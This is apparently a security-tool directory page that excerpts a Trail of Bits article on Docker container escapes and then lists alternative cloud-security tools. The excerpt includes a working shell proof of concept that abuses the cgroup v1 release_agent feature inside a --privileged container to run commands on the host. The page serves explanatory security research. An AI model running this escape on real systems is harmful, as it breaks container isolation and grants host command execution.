Understanding Docker container escapes Logo

Understanding Docker container escapes

0
Free
Visit Website

Trail of Bits recently completed a security assessment of Kubernetes, including its interaction with Docker. Felix Wilhelm’s recent tweet of a Proof of Concept (PoC) “container escape” sparked our interest, since we performed similar research and were curious how this PoC could impact Kubernetes. Felix’s tweet shows an exploit that launches a process on the host from within a Docker container run with the --privileged flag. The PoC achieves this by abusing the Linux cgroup v1 “notification on release” feature. Here’s a version of the PoC that launches ps on the host: # spawn a new container to exploit via: # docker run --rm -it --privileged ubuntu bash d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh ps >'"$t/o" >/c; chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o The --privileged flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and

FEATURES

ALTERNATIVES

AWS serverless cloud security tool for parsing and alerting on CloudTrail logs using EQL.

A tool for building Open Container Initiative (OCI) container images with various functionalities.

Detect off-instance key usage in AWS by analyzing CloudTrail files locally.

A tool that discovers all AWS resources created in an account

Automate AWS security checks and centralize security alerts.

A CLI tool and Go library for generating a Software Bill of Materials (SBOM) from container images and filesystems.

An AI-powered Cloud Native Application Protection Platform (CNAPP) that provides unified cloud security with attack surface management for small and medium businesses.

Commercial

S3Scanner scans for misconfigured S3 buckets across S3-compatible APIs, identifying potential security vulnerabilities and data exposure risks.

PINNED